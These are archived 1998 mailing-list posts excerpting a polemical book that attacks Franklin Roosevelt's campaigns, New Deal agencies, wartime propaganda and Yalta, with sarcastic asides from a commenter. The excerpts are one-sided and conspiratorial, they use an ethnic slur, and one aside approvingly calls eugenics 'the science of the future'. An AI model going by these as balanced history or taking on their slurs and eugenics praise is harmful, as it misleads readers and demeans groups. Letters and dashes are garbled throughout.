state no matter who is nominated" and (2) "My doctors are definite
that the continued improvement in my
condition is dependent on avoidance of a cold climate" and "daily exercise
in Warm Springs during the winter
months." He added: "As I am only 46 years old I owe it to my family
and myself to give the present constant
improvement a chance to continue ... I must therefore with great regret
confirm my decision not to accept the
nomination."31 
{Roosevelt trying to 'back out' of his role as schill... -sog}
Mrs. Roosevelt was in Rochester as a member of the Women's Committee
for Al Smith. So were Ed Flynn and
John J. Raskob, recently named chairman of the National Democratic
Committee to manage Al Smith's campaign
for the presidency.
{...but Elanor is in deep. - sog}

But Flynn told Smith that he believed Roosevelt could be induced to
accept, that his health
treatments were not the real reason for his refusal, that the real
reason was the financial obligations he had
outstanding at Warm Springs, that he was facing a heavy personal loss
but that if this could be gotten out of
the way he might yield. Smith told Flynn to tell Roosevelt they would
take care of his financial problem. "I don't
know how the hell we can do it, but we'll do it some way," he said.32
Flynn suggested that the problem be put
up to Raskob. This was done. Smith asked Raskob to telephone Roosevelt.
Raskob thought it over but decided
to talk to Mrs. Roosevelt about it. 

He asked Mrs. Roosevelt for
her frank opinion. She replied that if her husband were to say his
health would permit him to run then Raskob
could rely on it and that the real reason was the financial problem
at Warm Springs. Everybody got the
impression that Mrs. Roosevelt wanted her husband to run. 

Raskob then asked him to say frankly
what they amounted to. Roosevelt replied: "Two hundred and fifty thousand
dollars." Raskob then brought the
whole matter to a head by saying: "All right. our nomination is important
in New ork State. I am in this fight
to get rid of Prohibition which I believe to be a terrible social curse
and I think the only way to do it is to elect
Al Smith. I am willing therefore to underwrite the whole sum of $250,000.
ou can take the nomination and
forget about these obligations. ou can have a fundYDraising effort
and if it falls short of the total I will make up
the difference." Roosevelt was a little flabbergasted at the offer.
{Elanor was not? - sog}

Roosevelt was built by propaganda, before the war on a small scale
and after the war upon an incredible scale,
into a wholly fictitious character YD a great magnanimous lover of the
world, a mighty statesman before whom
lesser rulers bowed in humility, a great thinker, a great orator YD
one of the greatest in history YD an enemy of evil
in all its forms. 

In his first administration someone was responsible for a very effective
job of selling Roosevelt
to the public. 

But over and above this some cunning techniques were industriously
used to
enhance the picture. For instance, Mrs. Roosevelt took over the job
of buttering the press and radio reporters
and commentators. They were hailed up to Hyde Park for hamburger and
hot dog picnics. They went swimming
in the pool with the Great Man. They were invited to the White House.
And, not to be overlooked, it was the
simplest thing in the world for them to find jobs in the New Deal for
the members of their families. 

*** sog ***
The most powerful propaganda agencies yet conceived
by mankind are the radio and the moving pictures. Practically all of
the radio networks and all of the moving
picture companies moved into the great task of pouring upon the minds
of the American people daily YD indeed
hourly, ceaselessly YD the story of the greatest American who ever lived,
breathing fire and destruction against
his critics who were effectually silenced, while filling the pockets
of the people with billions of dollars of war
money. The radio was busy not only with commentators and news reporters,
but with crooners, actors, screen
stars, soap opera, comedians, fan dancers, monologists, putting over
on the American mind not only the
greatness of our Leader but the infamy of his critics, the nobility
of his glamorous objectives and the sinister
nature of the scurvy plots of his political enemies. The people were
sold first the proposition that Franklin D.
Roosevelt was the only man who could keep us out of war; second that
he was the only man who could fight
successfully the war which he alone could keep us out of; and finally
that he was the only man who was
capable of facing such leaders as Churchill and Stalin on equal terms
and above all the only man who could
cope successfully with the ruthless Stalin in the arrangements for
the postYDwar world. 
*** sog ***

The ordinary man did not realize that Hitler and Mussolini were made
to seem as brave, as strong, as wise and
noble to the people of Germany and Italy as Roosevelt was seen here.
Hitler was not pictured to the people of
Germany as he was presented here. He was exhibited in noble proportions
and with most of those heroic
virtues which were attributed to Roosevelt here and to Mussolini in
Italy and, of course, to Stalin in Russia. I
do not compare Roosevelt to Hitler. I merely insist that the picture
of Roosevelt sold to our people and which
still lingers upon the screen of their imaginations was an utterly
false picture, was the work of false propaganda
and that, among the evils against which America must protect herself
one of the most destructive is the evil of
modern propaganda techniques applied to the problem of government.

{Eugenics was in vogue here, as well as Germany, and would have formed
the
science of the future *immediately* if Hitler had not been linked to
its 'final
outcome', giving it a bad name. - sog}

There
was really nothing complex about Roosevelt. He was of a wellYDknown
type found in every city and state in
political life. He is the wellYDborn, rich gentleman with a taste for
public life, its importance and honors, who finds
for himself a post in the most corrupt political machines, utters in
campaigns and interviews the most pious
platitudes about public virtue while getting his own dividends out
of public corruption one way or another. 

e NRA Act
provided an appropriation of $3,300,000,000 which the President was
given to be spent for relief and recovery at
his own discretion. He now had in his hands a sum of money equal to
as much as the government had spent in
ten years outside the ordinary expenses of government. He decided how
it should be spent and where. If a
congressman or senator wanted an appropriation for his district, instead
of introducing a bill in Congress, he
went up to the White House with his hat in his hands and asked the
President for it. All over the country,
states, cities, counties, business organizations, institutions of all
sorts wanted projects of all kinds. Instead of
going to Congress they went to the President. After that congressmen
had to play along with the President or
they got very little or nothing for their districts. This was the secret
of the President's power, but it was also a
tremendous blow at a very fundamental principle of our government which
is designed to preserve the
independence of the Congress from the Executive. 

In the same way, blankYDcheck legislation led to the subservience of
Congress and the rise of the bureaucracy.
Under our traditional system, Congress alone could pass laws. The executive
bureau merely enforced the law.
But now Congress began to pass laws that created large bureaus and
empowered those bureaus to make
"regulations" or "directives" within a wide area of authority. Under
a law like that the bureau became a
quasiYDlegislative body authorized by Congress to make regulations which
had the effect of law. This practice
grew until Washington was filled with a vast array of bureaus that
were making laws, enforcing them and
actually interpreting them through courts set up within the bureaus,
literally abolishing on a large scale within
that area the distinction between executive, legislative and judicial
processes. 

Many of these bureaus were never even authorized by Congress. Even
the Comptroller General of the United
States, who audits the government's accounts, declared he had never
heard of some of them. They were
created by a new method which Roosevelt exploited. Instead of asking
Congress to pass a law, set up a bureau
and appropriate money, the President merely named a group of men who
were authorized by him to organize a
corporation under the laws of the states. This done, there was a government
corporation instead of a bureau
and a group of corporation directors instead of commissioners. The
Reconstruction Finance Corporation was
given a blanket appropriation by Congress and authority to borrow money.
It borrowed twenty or more billions.
The RFC would buy the stock of a new corporation and lend it money
YD ten, fifty or a hundred million, billions in
some cases. Thus the President bypassed Congress and the Constitution
and engaged in activities as
completely unconstitutional as the imagination can conceive, such as
operating business enterprises in Mexico
and Canada. By means of the blankYDcheck appropriations, the blankYDcheck
legislation and the government
corporation, there is no power forbidden to the government by the Constitution
which it cannot successfully
seize. And if these techniques are permitted to continue the Constitution
will be destroyed and our system of
government changed utterly without a vote of the people or any amendment
to the Constitution. Roosevelt by
his various hit or miss experiments all designed to get power into
his hands, prepared a perfect blueprint for
some future dictator of the modern school to usurp without very much
difficulty all the powers he needs to
operate a firstYDclass despotism in America. 

Having changed the Neutrality Act, given a million army rifles to England
and increased the army to 1,500,000,
the President took the next step YD he handed over to Britain 50 destroyers
belonging to the American navy
without authority of Congress. Those men and women who formed the various
committees to induce this
country to go into the war approved these moves. They were honest about
it and logical, because they were
saying openly we should give every aid, even at the risk of war. But
the President was saying he was opposed
to going to war and that he was doing these things to stay out of war.
I do not here criticize his doing these
things. I criticize the reason he gave, which was the very opposite
of the truth. At the time he did these things,
83 per cent of the people month after month were registering their
opposition to getting in the war. 

After the 1940 election, in fact early in 1941, the President's next
decision was the LendYDLease proposal. Senator
Burton K. Wheeler declared that this was a measure to enable the President
to fight an undeclared war on
Germany.

The truth is that the President had made up his mind to go into the
war as early as October, 1940. To believe
differently is to write him, our naval chiefs of staff and all our
high military and naval officers down as fools. 

The answer must be that Roosevelt lied to the people for their own
good. And if
Roosevelt had the right to do this, to whom is the right denied? At
what point are we to cease to demand that
our leaders deal honestly and truthfully with us? 

There must be a thorough philosophical inquiry into the limits within
which this convenient discursive weapon
can be used. It has been generally supposed that our diplomats are
free to lie to foreign diplomats, also that in
war and on the way into war we are free to lie ad libitum to the enemy.
The right of the President YD and maybe
certain lesser dignitaries YD to lie to our own people and, perhaps,
in certain defined situations, to each other
ought to be explored and settled. Thus it may be used impartially by
the representatives of all parties. It does
not seem fair to limit the right of lying only to good and truthful
men. 
(TruthMonger Lives!!! - sog}

President and the
Prime Minister issued what they called a Joint Declaration. The most
important parts of that document were the
first three paragraphs: 

"First, their countries seek no aggrandizement, territorial or otherwise.

"Second, they desire to see no territorial changes that do not accord
with the freely expressed desires of the
peoples concerned. 

"Third, they respect the right of all peoples to choose the form of
government under which they will live and
they wish to see sovereign rights and selfYDgovernment restored to those
who have been forcibly deprived of
them." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:13:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR3
Message-ID: <009C9C7C.2368A280.7@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was no reason for meeting at sea save
the purely spectacular features which Roosevelt always loved. The dramatic
effect of the meeting was very
great. It made a thunderous radio story and massive headlines. But,
as was so characteristic of Roosevelt, the
great declaration of principles was a mere incident of the meeting.
The purpose was wholly military. 

Three weeks after Pearl Harbor, Roosevelt sent for all the representatives
in America of these occupied
countries and said to them: 

"Be assured, gentlemen, that the restoration of the countries occupied
by Germany and suffering under the
Axis yoke is my greatest concern, which is shared in like degree by
Mr. Churchill. We promise that all will be
done to insure the independence of these countries." 

Churchill was present. He turned to the Polish Ambassador and said:

"We will never forget what glorious Poland has done and is doing nor
what heroic Greece and Holland have
done in this war. I hope I need not add that Great Britain has set
herself the aim of restoring full independence
and freedom to the nations that have been overrun by Hitler."

These reassurances were to be repeated many times with varying oratorical
flourishes. And as for the "Atlantic
Charter," which was nothing more than a screen to hide what had actually
been done at Placentia Bay, a
handsome copy of it was made, bearing the names of Churchill and Roosevelt,
and placed on exhibition in the
National Museum in Washington, where crowds viewed it with reverence
as one of the great documents of
history. 

. On November 27, just ten
days before the attack, the President told Secretary Stimson, who wrote
it in his diary, that our course was to
maneuver the Japanese into attacking us. This would put us into the
war and solve his problem.

The Board of Economic Warfare was created to control the export of
all materials seeking private
export and to look after the procurement of all materials essential
to the war effort, except arms and munitions.
Vice President Wallace was named chairman of the Board of Economic
Warfare (BEW). 

There was an element of "cloak and dagger" in this institution. It
was at war with Hitler and Hirohito in the
markets of the world. It bought things we needed. But it also bought,
where necessary, things we did not need
in order to preclude the enemy getting them. This was called "preclusive"
buying. It issued thousands of
export licenses every day. It was quite a bureau and it bulged with
bureaucrats. At the top, next to Wallace,
was a somewhat cheaper edition of Wallace YD an authentic New Deal bureaucrat,
if there ever was one. He was
Milo Perkins, executive director. 

Perkins was a man with a soul YD one of
those souls that keeps making a lot of noise inside his body. He went
in for art and music and finally
Theosophy. The New Republic said of him that "for nine years at nine
every Sunday morning, he donned his
priestly robes, took along his sons and acolytes and preached to a
congregation of fifty people."

By 1943 the BEW had 200 economic commandos in the field fighting Hitler
in the market places of the world and
around 3,000 in Washington directing their weird operations
Although this outfit spent $1,200,000,000, no law ever authorized it,
and the Senate never confirmed the
appointment of Wallace or Perkins. The President "grabbed the torch"
and created it by edict.

Of course, a great legion of economic soldiers had to have a chief
economist. How they picked him I do not
know. But these two great geopolitical warriors YD Wallace and Perkins
YD came up with a gentleman named Dr.
Maurice Parmalee, born in Constantinople. 
Parmalee wrote another book labeled "Bolshevism, Fascism and the Liberal
Democratic State." In this
he renders it feasible to introduce a planned social economy much more
rapidly than has been the case in the
U.S.S.R. ...The superficial paraphernalia of capitalism can be dispensed
with more quickly than in the Soviet
Union." But the doctor had strayed into much lighter fields of literature.
He had also written a book called
"Nudism in Modern Life" which is secluded in the obscene section of
the Library of Congress. In it the doctor
revealed his interest in a science called Gymnosophy, a cult of the
old gymnosophists who it seems were
ancient Hindu hermit philosophers who went around with little or no
clothing. 

"these gymnosophist nudist colonies furnish excellent opportunities
for experiments
along socialist lines ... Customary nudity is impossible under existing
undemocratic, social and economic and
political organization." 

A new chief economist was brought in YD Dr. John Bovingdon.
Bovingdon was no fool. He went to Harvard and graduated with honors,
which is more than Mr. Roosevelt did.
But he, too, was one of those free spirits of the wandering winds who
had managed to live for a while in the
Orient, three years in Europe and England, two years in Russia and
for smaller terms in 22 other countries. His
Harvard class reunion book said he "engaged in art activities, painting
on fabrics, poetry, dancing, acting,
consultant on the Moscow Art Theater, oneYDman commercial monodrama
programs, weaving, sandalYDmaking"
and so on. In 1931 the police in Los Angeles raided a Red pageant for
a Lenin Memorial which Bovingdon was
staging. The experience shook Mr. Bovingdon terribly and he went to
Russia. He got a job in Moscow as a
director of the International Theatre. He worked as a journalist in
the world of free Russian speech, wrote radio
scripts and plays. He decided to return to the United States to make
us understand Russia. 
In January, 1938, he appeared in Long Beach,
California, at the town's first "Communist Party celebration on the
14th anniversary of Lenin's death." 

By what curious movement of the stars did these weird ideological brothers
turn up on posts of the
greatest importance in the councils of the New Deal? As fast as one
was pushed out another moved in. It could
not be by chance, since this happened in practically every important
bureau.
{Can you say 'conspiracy?...sure you can... - sog}

These two strange birds were not isolated cases. The UnYDAmerican Activities
Committee gave Wallace a list of
35 Communists in the BEW. That information was merely brushed aside
with some insulting smear against the
Committee. 

It mattered not what the New Dealer touched, it became a torch to be
grabbed, it became an instrument for use
in his adventures in social engineering, and after June, 1941 when
Hitler turned on his partner Stalin, these
bureaus became roosting places for droves of Communist termites who
utilized their positions as far as they
dared to advance the interests of Soviet Russia and to help "dispense
with the superficial paraphernalia of
capitalism" in this country under cover of the war. 

By no means a basically bad person, he was
congenitally incapable of resisting the destructive personal effects
of power. 

*** sog ***
>From the four corners of the land, as well as from the pink and Red
purlieus of New ork and Chicago and
every big city, came the molders of the Brave New World.
*** sog ***

They put their busy fingers into everything. They dictated women's
styles, the shapes of women's stockings;
they told butchers how to carve a roast; they limited the length of
Santa Claus' whiskers in department stores. 

At one time there was an almost complete breakdown of food distribution
throughout the United States. The
paper work required of an ordinary small merchant was so extensive
that it was practically impossible to comply
with.

These rules and regulations became so irksome that people ignored them.
Then the OPA set up a nationwide
network of courts before which citizens could be hauled up and tried
for breaking laws enacted by OPA
bureaucrats. If convicted, they could, under OPA rulings, have their
ration cards taken away from them YD
sentenced to starve. 

One may talk about the profits of war, but there were in truth
little profits for honest men because the government YD and rightly
YD during the war drained away in drastic taxes
most of the profits. 

In the financing and supervision of the war effort from
Washington practically every fiscal crime was committed. And the plain
evidence of that is before us in the bill
for the war. Few realize how vast it was. For the mind, even of the
trained financier, begins to lose its capacity
for proportion after the figures pass beyond the limit of understandable
billions. The war cost I reckon at 363
billion dollars. 

Chapter Eight - The Thought Police

1.

If there is one department of human struggle which the radical revolutionist
understands and loves it is the war
that is waged on the mass mind; the war that is carried on with poisons
distilled in the mind to produce bias
and hatred. It would be strange indeed if we did not find some of the
practitioners of this dark art from New
ork and some of the offYDscourings of Europe's battered revolutionary
emigres numerously entrenched in that
thoroughly unYDAmerican institution during the war which was known as
the OWI YD the Office of War
Information. 

It began with a thing called the Office of Facts and Figures.
a drove of writers and journalists whose souls were enlisted in the
great crusade to bring on the Brave
New World of the Future. It was in fact an agency for selling Roosevelt's
Third New Deal and Roosevelt
himself to the people under the guise of "maintaining public morale"
and conducting "psychological warfare."

, OWI spent $68,000,000 and had 5,561
agents scattered all over the world.

But OWI had other tasks than selling America to the Arabs. It was also
busy selling Russia to the Americans.
The chief of the Foreign Language Section of OWI was a young gentleman
28 years old who had spent his
entire life on New ork's East Side, who spoke no foreign language
and yet had the decision on whether news
should be released to Europe or not. Anybody who disagreed with his
high admiration for our Soviet ally was
labeled a fascist. There was another child wonder YD 23 years old YD
who was the Russian expert of the OWI and
who saw to it that nothing went out that was displeasing to the objectives
of our noble ally YD including
grabbing ugoslavia. OWI's broadcasts to Poland ended not with the
Polish national anthem but with a song
adopted by the Polish emigres in Moscow who were known as Stalin's
"Committee of Liberation." The expert in
charge of the Polish section was actually born in Poland, but left
there and spent the rest of his life in France
where he was notorious as a Communist. He fraternized with the Vichy
government while Hitler and Stalin were
pals, but when Hitler invaded Russia he came to America and quickly
became OWI's expert in explaining
American democracy to the people of Poland.51 

The deputy director of the Pacific and Far Eastern Area was a British
subject until he got a government job in
Washington in 1942. While running this important bureau for OWI, he
wrote a play which was produced at
Hunter College. Burton Rascoe, reviewing it, said: "Its most conspicuous
purpose is to idealize the Red Army
in China, to defame the Chungking government under Chiang KaiYDshek
and to ridicule the political, social and
educational ideas of the vast majority of the American people."52 

The men, material, cable and wireless time used up by OWI were immense.
It ran 350 daily radio programs and
had a daily cableYDwireless output of 100,000 words. It was the world's
largest pamphlet and magazine publisher
and a big movie producer, sending shorts to every country in the world.
It sent out 3,500 transcribed
recordings a month and turned out 50 movie shorts a year. The content
of most of this material was pure drivel.

All of this work was not just naive. OWI printed 2,500,000 pamphlets
called "The Negro in the War,"54 with
pictures of Mr. and Mrs. Roosevelt, the Negroes' friends, in preparation
for the fourthYDterm campaign. It printed
a handsome volume called "Handbook of the United States"55 and gave
a British firm the right to publish it.
This gave a history of America, with the story from Leif Ericson's
discovery up to 1932 in four and oneYDhalf
pages. The rest of the history was devoted to Roosevelt and his New
Deal. This was in 1944 and a national
election was coming and England was jammed with American soldiers who
could vote. 

It had a department that supplied the pulp paper magazines with direction
and suggestions on how to slant
mystery and love stories. Western story writers were told how to emphasize
the heroism of our allies YD you
know which one. Writers were told to cast their soap operas with silent,
dogged Britons, faithful Chinese and
honest Latins. They must portray Japanese as having set out to seize
our Western seaboard and the sly and
treacherous characteristics of the Jap must be contrasted with the
faithfulness of the Chinese. They suggested
that Sax Rohmer's Fu Manchu be turned into a Jap instead of a Chinese.

When the war began the government, recognizing the need for protecting
our military operations from leaks
through careless or uninformed press reporting, organized the Office
of Censorship headed by Byron Price, an
able official of the Associated Press. To this bureau was given the
power to monitor all communications. It set
up a censorship organization which all publishers and broadcasters
voluntarily cooperated with. It worked
admirably and Mr. Price won the unstinted approval of the press for
his capable and tactful, yet firm, handling
of this difficult problem. No other government agency had any authority
whatever to engage in this activity.
And it was never intended that anybody should have the power to attempt
to interfere with the rights of
citizens to discuss with freedom all political questions, subject only
to the obligation not to divulge information
that would aid the enemy or defeat our military operations. 

Nevertheless, the OWI and Federal Communications Commission (FCC) took
upon themselves the power to
carry on the most extensive propaganda among, and the most dangerous
interference with, the
foreignYDlanguage broadcasting stations. Of course the ordinary American
official was hardly aware of the
opportunities this kind of thing gave to those who had political or
ideological axes to grind. 

It was important to see that nothing subversive and nothing that would
adversely affect the war effort
was used. And for this purpose the Office of Censorship was admirably
equipped and managed. But the FCC
decided that it would take a hand, not merely in monitoring the stations
but in literally directing and controlling
them. The OWI similarly arrived at the same conclusion. It also set
up a division for dealing with the problems
of the foreignYDborn through radio. 

Mr. Eugene L. Garey, chief counsel of the Congressional Select Committee
Investigating the FCC, speaking of
these conditions said: 

"From the record thus far made it appears that, in one foreign language
broadcasting station in New ork City,
the program director, the announcer, the script writer, the censor,
and the monitor of the ItalianYDlanguage
programs are all aliens or persons owing their positions to the Office
of War Information, with the approval of
the FCC. 

"The situation thus portrayed is not peculiar to this single station,
or to this one city. Information in our
possession indicates that the same situation prevails generally in
the foreign language stations throughout the
country. Every such key position in each of the three radio stations
presently under investigation are found to
be similarly staffed. These staffs select the news, edit the script,
and announce the program. The program, in
turn, is censored by them, monitored by them, and is presented under
the direction of a program director of
similar character. 

"From these apparently unrelated facts the picture must be further
developed. 

"OWI had the men and the material. It had the proper dye to color the
news. It also had the desire to select and
censor the news. What it lacked was the power, or perhaps more accurately
stated, even the color of power, to
carry their designs into effect. Hence the need to enlist the Federal
Communications Commission in its purpose.

"True it is that the Federal Communications Commission had no such
lawful power, but the Federal
Communications Commission did have the power to license and hence the
power to compel obedience to its
directions. The record now shows their unlawful use of this power.

"Working together in a common purpose, the Federal Communications Commission
and the Office of War
Information have accomplished a result that compels pause YD and presents
the solemn question of 'Whither are
we going?' 

"A division called the War Problems Division was created by the Federal
Communications Commission, and a
staff of attorneys began to function. 

"This division was not a regulatory body. It was not formed to instruct,
or supervise, or to correct. It was
formed for the avowed purpose of unlawfully liquidating all of the
radio personnel in the foreignYDlanguage field
that did not meet with its favor. A real gestapo was created and a
lawless enterprise was launched. 

"It is suggested that we accept this unlawful situation as a benevolent
expedient of the moment, but no such
purpose as we find here disclosed, however benevolently cloaked, can
justify the practices we find. All tyranny
begins under the guise of benevolence. 

"The voices of these aliens go into our homes, and the unwary are led
to believe that they speak with authority
and official approval. They even censor our Christmas and Easter religious
programs, and tell us what music we
may hear. The FCC is alarmed about whether we will react properly to
news furnished by our national news
agencies. Apparently we can still read the news in our press, but we
can only hear what these aliens permit us
to. What next medium of communications will receive the benevolent
attention of these misguided zealots?
Obviously, the press. 

"These interpreters of our national policy YD these slanters of our
news YD these destroyers of free speech YD are
alien in birth, alien in education, alien in training and in thought.

"And still these are the people who are permitted to mold our thoughts
YD to tell us what America's war aims and
purposes are. These people are in position to color, to delete, or
to slant, as they see fit, in accordance with
their own peculiar alien views and ideologies. 

"Persons are being accused of being proYDfascist, and that without proof
and without trial. Persons suspected of
being proYDfascist, and without proof, have been removed from the air
and replaced by wearers of the Black Shirt
... 

"If the radio can thus be controlled in August, 1943, there is nothing
to prevent the same control from slanting
our political news and nothing to prevent the coloring of our war aims
and purposes when peace comes."57 

In the presence of a government which had enlarged its power over the
lives and the thoughts and opinions of
citizens and which did not hesitate to use that power, the whole citizenry
was intimidated. Editors, writers,
commentators were intimidated. Men whose opinions did not conform to
the reigning philosophy were driven
from the air, from magazines and newspapers. While American citizens
who were moved by a deep and
unselfish devotion to the ideals of this Republic YD however wrongYDheaded
that may be in the light of the new
modes of "freedom" YD were forced into silence, the most blatant and
disruptive revolutionary lovers of the
systems of both fascism and Communism and that illegitimate offspring
of both YD Red fascism YD were lording it
over our minds. 

All this was possible for one reason and one reason only YD because
the President of the United States
countenanced these things, encouraged them and in many cases sponsored
them, not because he was a
Communist or fascist or held definitely to any political system, but
because at the moment they contributed to
his own ambitions. 

When a nation is at war, its leaders are compelled by the necessities
of practical administration to use every
means at hand to sell the war to the people who must fight it and pay
for it. As part of that job it is usual to
include the leader himself in the package. He is therefore portrayed
in heroic proportions and colors in order to
command for his leadership the fullest measure of unity. War, as we
have seen, puts into the hands of a leader
control over the instruments of propaganda and opinion on an everYDincreasing
scale. In our day the press, the
radio, the movies, even the schoolroom and the pulpit are mobilized
to justify the war, to magnify the leader and
to intimidate his critics. The citizen who is hardy enough to question
the official version of the leader and his
policies may find himself labeled as a public enemy or even as a traitor.
Hence as the war proceeds, amidst all
the trappings which the art of theater can contribute, it is possible
to build up a vast fraud, with an
everYDmounting torrent of false news, false pictures, false eulogies
and false history. After every war many years
are required to reduce its great figures to their just proportions
and to bring the whole pretentious legend back
into focus with truth. 

the public was treated to the royal spectacles off the coast
of Newfoundland aboard the Augusta, at Quebec, Casablanca, Moscow,
Cairo, Teheran and finally at alta.
Eloquent communiques pretended to inform the people of what had been
agreed on.
We now know that these communiques told us little of what had happened;
that the whole story lay, for long,
behind a great curtain of secrecy; that much YD though not all YD has
now been painfully brought to light and that
what stands revealed is a story very different from that heroic chronicle
of triumphs with which we were regaled
at the time. 

As Roosevelt saw it, Stalin was his great target. He began by completely
deceiving himself about Stalin. First of
all, he decided he must cultivate Stalin's good will and to do this
he convinced himself he must sell Stalin to our
people. Accordingly the instruments of propaganda which he could influence
YD the radio and the movies and to
a considerable degree, the press YD were set to work upon the great
task. 

Under the influence of this benevolent atmosphere the Reds in New ork
and their compliant dupes, the
fellowYDtravelers, swarmed into Washington and presently were sitting
in positions of power or influence in the
policyYDmaking sections of the government. Joe Davies had been induced
to go to Moscow, wrote his notorious
"Mission to Moscow," a jumble of obvious fictions which were later
transferred to the screen several times
exaggerated and shot into millions of minds in movie houses. 

We know now from the election returns
of 1944 that the Reds had in their hands enough support to have turned
the tide against Roosevelt. In New
ork State, for instance, Roosevelt won its 47 electoral votes by a
majority of 317,000. But he got 825,000 votes
from the Red American Labor Party dominated by the Communists, which
had also nominated him, and the
American Liberal Party made up of the pinks, which also nominated him.
Without these votes he would have
lost the state. He dared not defy these two powerful groups. On the
other hand, he was in a very deep hole
with the votes of the Polish, Lithuanian, Serbian and other Baltic
and Balkan peoples living in America who
were citizens. He had betrayed the Poles, the Serbs and the Baltic
peoples. But he had managed to keep it dark.
Somehow he must avoid any publication of the truth until after the
election. 

They made a decision at Quebec which has up to this moment paralyzed
utterly the
making of a stable peace in Europe and is pregnant with consequences
so terrible for the future that the mind
draws away from them in consternation.

Secretary Hull said: "This was a plan of blind vengeance ... It failed
to see that in striking at Germany it was
striking at all Europe." The proposals "that the mines be ruined was
almost breathtaking in its implications for
all Europe."

Beyond all this, of course, was our dignity as a civilized
people. The barbarians could sweep into enemy countries and ravage
their fields, burn their cities and murder
their leaders. This is a job from which a civilized people must recoil
if they have not lost their souls.

Roosevelt agreed to the Morgenthau Plan to destroy German industry
and to reduce Germany to a country
primarily agricultural and pastoral. Secretaries Hull and Stimson did
not know anything about it until four days
after it was done. 

e the contents of the Morgenthau Plan leaked to the papers and
Roosevelt became alarmed at the violence of the reaction, a fine evidence
of the fundamentally decent nature of
the majority of Americans. 

In the end the President was persuaded to get out of this appalling
agreement so far as destroying the mines of
the Ruhr were concerned. But Stimson declares "the same attitude remained,"
and the whole world now knows
of the frightful wreckage that was carried on in Germany and the blow
to the economy of all Europe that was
delivered in the name of "blind vengeance" and immortal hatred. 

The administration was now the hopeless prisoner of these demanding
and ruthless radical labor
leaders, who had shown their ability to elect or defeat the Democratic
party, who had filled all the departments
and bureaus with their agents and who had insinuated their experts
into the CIO labor unions and their
propagandists into the radio, the movies and all the great instruments
of communication and opinion YD a fact
which Mr. Roosevelt's successors would have to face when the war ended.

What had become of the Atlantic Charter? On December 20, 1944, the
President at a press conference was
asked about the Charter which he and Churchill had signed. His reply
literally bowled over the correspondents.
There was not and never had been a complete Atlantic Charter signed
by him and Churchill, he replied. Then
where is the Charter now, he was asked. He replied: "There wasn't any
copy of the Atlantic Charter so far as I
know." It was just a press release. It was scribbled on a piece of
paper by him and Churchill and Sumner Welles
and Sir Alexander Cadogan. It was just handed to the radio operator
aboard the British and American warships
to put on the air as a news release. Further inquiry revealed that
Stephen Early had handed it out on his own
with the signatures of Churchill and Roosevelt attached. And over on
the wall of the National Museum in
Washington, beautifully framed and illuminated after the manner of
an ancient document YD like Magna Carta or
the Declaration of Independence YD was the great Atlantic Charter itself,
with the signatures of Roosevelt and
Churchill. Daily visitors stood before it as before some great historic
document. John O'Donnell, of the New
ork Daily News, asked the curator where he got it. He answered that
it came from the Office of War
Information. They had "loaned" the precious document to the National
Museum. By inquiry at the OWI YD that
prolific fountain of phony news YD O'Donnell learned that OWI had gotten
it up and affixed the names of
Roosevelt and Churchill. They had printed 240,000 copies of it. O'Donnell
went back to the Museum with this
information. And lo! the great Charter was gone. An attendant told
him it had been ordered off the wall twenty
minutes before. Thus ended the story of this wretched fraud. The fake
document which was never signed and
was nothing more than a publicity stunt to conceal the real purposes
of the Atlantic meeting had been slain by
its chief sponsor and, of course, all its highYDsounding professions,
after Teheran, had become as sounding
brass or a tinkling cymbal. 

On January 20, 1945, Roosevelt was sworn in as President of the United
States for a fourth term. Three days
later he left Norfolk on the heavy cruiser Quincy for what was to be
his last act in the hapless drama of peace. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:14:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR4
Message-ID: <009C9C7C.37572C80.9@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


The Polish question was "settled." The formal proposal to hand over
eastern Poland YD east of the Curzon line YD
was made by Roosevelt himself.102 As to western Poland, Stalin already
had a government there named by him
and composed of Communists representing no one but Stalin himself.

Russia wanted the amount to be 20 billion dollars of which she would
take half. It
was agreed that labor might be taken as a possible source of reparations.
This was just a diplomatic way of
authorizing the seizure of human beings to work as slaves after the
war ended and is the basis of that dreadful
crime perpetrated after hostilities ceased to which the President of
the United States agreed.

As the conference ended, Roosevelt remained an extra day because Stalin
wanted to talk with him. He did so
alone. What he wanted settled was "the political aspects of Russia's
participation" in the Pacific. This he was
able to do very quickly and to his complete satisfaction. In return
for Russian participation in the Pacific,
Roosevelt agreed that the Kuriles Islands would be handed to Russia,
who would also get Sakhalin Island,
internationalization of the Port of Darien, the lease of Port Arthur
as a naval base and joint operation with China
of the Eastern and Southern Manchurian railroads. And Roosevelt promised
to use his influence with Chiang
to force him to agree. This secret agreement, like the one supporting
the use of slave labor, was not made
public and was concealed even from Byrnes who was Roosevelt's adviser
at alta. He did not hear of it until
after Mr. Roosevelt's death. Then he saw a reference to it in a Russian
dispatch. By that time he was Secretary
of State. He asked President Truman to have the White House records
searched for this and any other secret
outstanding I.O.U.'s.105 

He did
suggest that to avoid criticism at home the United States be given
three votes too. And Stalin agreed. When
Byrnes got back to the United States he found a note from Roosevelt
instructing him not to discuss this
agreement even in private. Later Roosevelt decided not to ask for the
three votes for the United States. Byrnes
says he never discovered the reason.106 

On the way home
General Watson, his military secretary, died suddenly of heart disease.
Roosevelt reached Washington the end
of February. On March 1 he appeared before a joint session of Congress.
He told the Congress that "more than
ever before the major allies are closely united," that "the ideal of
lasting peace will become a reality." There was
no hint that the surrender which was now formally announced with respect
to eastern Poland was in fact a
major defeat. The disappearance of the Baltic states and practically
all the Balkans behind Stalin's iron curtain
was not announced in any other terms than as a great forward step in
the liberation of Europe. As for western
Poland, there were heavy overtones of guilt and frustration unintentionally
evident. 

In two months Roosevelt was dead. Truman became President. Shortly
after, in May, the German Army
surrendered. The fighting was in the West was over. 

"Silent, mournful, broken Czechoslovakia recedes into the darkness.
She
has suffered in every respect by her association with the Western democracies."
Chamberlain appeased Hitler
and averted war. Churchill got for England both a war and appeasement.

Stalin had merely to sit tight, to make known
his wishes and Roosevelt laid them in his lap with eager compliance
